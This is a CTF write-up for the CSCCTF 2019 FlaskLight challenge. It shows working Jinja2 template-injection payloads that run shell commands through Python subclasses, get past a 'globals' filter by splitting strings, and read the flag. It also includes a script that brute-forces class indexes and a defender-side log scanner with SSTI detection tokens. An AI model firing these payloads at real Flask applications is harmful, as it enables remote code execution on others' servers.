[CSCCTF 2019 Qual] FlaskLight
Template injection
The search page echoes back whatever was searched for.
A hint in the page source (F12) says the search parameter is passed via GET, so that is where SSTI can be tested for.
List all subclasses:
?search={{''.__class__.__mro__[2].__subclasses__()}}
Look for a usable subclass. The Python script below finds the index of the usable classes:
import requests
import re
import html
import time

index = 0
for i in range(0, 1000):
    try:
        url = "http://57640c8d-f6b1-4fa4-9e8a-b4b9c1850d3b.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        # res[0] holds the echoed search result
        res = re.findall(r"<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        # time.sleep(0.1)
        res = html.unescape(res[0])  # unescape the HTML entities in the echoed string
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except Exception:
        continue
print("index of subprocess.Popen: " + str(index))

# 258 | <class 'subprocess.Popen'>
# 59 | <class 'warnings.catch_warnings'>
# 71 | <class 'site._Printer'>
Three of these classes are commonly used.
payload1
59 | <class 'warnings.catch_warnings'>
globals seems to be filtered; the filter can be bypassed by splitting the string and joining the pieces with +
?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("ls").read()')}}
?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("ls /flasklight").read()')}}
?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("cat /flasklight/coomme_geeeett_youur_flek ").read()')}}
payload2
71 | <class 'site._Printer'>
?search={{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
payload3
258 | <class 'subprocess.Popen'>
?search={{[].__class__.__base__.__subclasses__()[258]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}
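As an added defender-side example, not part of the original writeup: a small access-log scanner that undoes the '__glo'+'bals__' split the writeup uses to get past the globals keyword filter, then flags the attribute chain (__class__, __subclasses__, __globals__, ...) in the search parameter. The log lines are constructed, and the token list and helper names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Names the writeup's payloads chain together to reach os/subprocess from a string or list.
SSTI_TOKENS = ("__class__", "__mro__", "__base__", "__subclasses__", "__globals__",
               "__builtins__", "__import__", "popen", "subprocess")

# Two adjacent quoted literals joined by '+' or only by whitespace: a literal '+' in a
# query string decodes to a space, and Jinja2 joins adjacent string literals like Python.
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+?\s*(['"])([^'"]*)\3""")

def normalize(value):
    """Strip one extra layer of percent-encoding, then fold split string literals."""
    value = unquote(value)
    prev = None
    while prev != value:  # repeat so 'a'+'b'+'c' collapses completely
        prev = value
        value = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", value)
    return value

def ssti_indicators(query):
    """Return the SSTI tokens found inside template expressions in a query string."""
    found = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for raw in values:
            text = normalize(raw)
            if "{{" in text or "{%" in text:
                found += [t for t in SSTI_TOKENS if t in text and t not in found]
    return found

def scan_log(lines):
    """Return (request_path, indicators) for each access-log line that carries a probe."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP/', line)
        if m:
            indicators = ssti_indicators(urlsplit(m.group(1)).query)
            if indicators:
                hits.append((m.group(1), indicators))
    return hits

# Constructed access-log lines: a benign search, the subclass-enumeration probe, and the
# catch_warnings and _Printer payloads, one with %2B and one with a literal '+'.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /?search=flask HTTP/1.1" 200 312',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /?search={{%27%27.__class__.__mro__[2].__subclasses__()}} HTTP/1.1" 200 9120',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /?search={{[].__class__.__base__.__subclasses__()[59].__init__[%27__glo%27%2B%27bals__%27][%27__builtins__%27][%27eval%27](%27__import__(%22os%22).popen(%22ls%22).read()%27)}} HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /?search=%7B%7B[].__class__.__base__.__subclasses__()[71].__init__[\'__glo\'+\'bals__\'][\'os\'].popen(\'ls\').read()%7D%7D HTTP/1.1" 200 640',
]
```

Calling scan_log(LOG_LINES) flags the last three requests and lists the folded tokens for each, including __globals__ even though it never appears verbatim in the raw request.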